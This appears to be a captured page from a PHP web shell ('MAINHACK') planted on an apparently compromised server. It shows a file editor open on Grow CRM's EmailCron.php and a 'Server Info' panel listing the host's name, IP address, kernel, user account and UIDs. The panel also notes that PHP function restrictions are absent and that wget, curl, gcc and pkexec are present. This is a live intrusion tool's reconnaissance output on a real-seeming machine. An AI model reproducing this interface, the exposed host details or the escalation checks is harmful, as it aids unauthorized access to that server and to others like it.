[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: EmailCron.php
<?php /** --------------------------------------------------------------------------------------------------- * Email Cron * Send emails that are stored in the email queue (database) * This cronjob is envoked by by the task scheduler which is in 'application/app/Console/Kernel.php' * - the scheduler is set to run this every minuted * - the schedler itself is evoked by the signle cronjob set in cpanel (which runs every minute) * @package Grow CRM * @author NextLoop *-----------------------------------------------------------------------------------------------------*/ namespace App\Cronjobs; use App\Mail\SendQueued; use Illuminate\Support\Facades\Mail; class EmailCron { public function __invoke() { //[MT] - tenants only if (env('MT_TPYE')) { if (\Spatie\Multitenancy\Models\Tenant::current() == null) { return; } } //boot system settings middlewareBootSettings(); //[MT] boot mail settings env('MT_TPYE') ? middlewareSaaSBootMail() : middlewareBootMail(); //delete emails without an email address \App\Models\EmailQueue::Where('emailqueue_to', '')->delete(); /** * Send emails * These emails are being sent every minute. You can set a higher or lower sending limit. */ $limit = 20; if ($emails = \App\Models\EmailQueue::Where('emailqueue_type', 'general')->where('emailqueue_status', 'new')->take($limit)->get()) { //log that its run //Log::info("some emails were found", ['process' => '[cronjob][email-processing]', config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'payload' => $emails]); //mark all emails in the batch as processing - to avoid batch duplicates/collisions foreach ($emails as $email) { $email->update([ 'emailqueue_status' => 'processing', 'emailqueue_started_at' => now(), ]); } //now process foreach ($emails as $email) { //send the email (only to a valid email address) if ($email->emailqueue_to != '') { //send email Mail::to($email->emailqueue_to)->send(new SendQueued($email)); //log email $log = new \App\Models\EmailLog(); $log->emaillog_email = $email->emailqueue_to; $log->emaillog_subject = $email->emailqueue_subject; $log->emaillog_body = $email->emailqueue_message; $log->save(); } //delete email from the queue \App\Models\EmailQueue::Where('emailqueue_id', $email->emailqueue_id)->delete(); } //reset last cron run data \App\Models\Settings::where('settings_id', 1) ->update([ 'settings_cronjob_has_run' => 'yes', 'settings_cronjob_last_run' => now(), ]); } //[UPCOMING] update database for items marked as processing but never completed. Mark them as 'new'. Based on processing timestamp } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.97 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002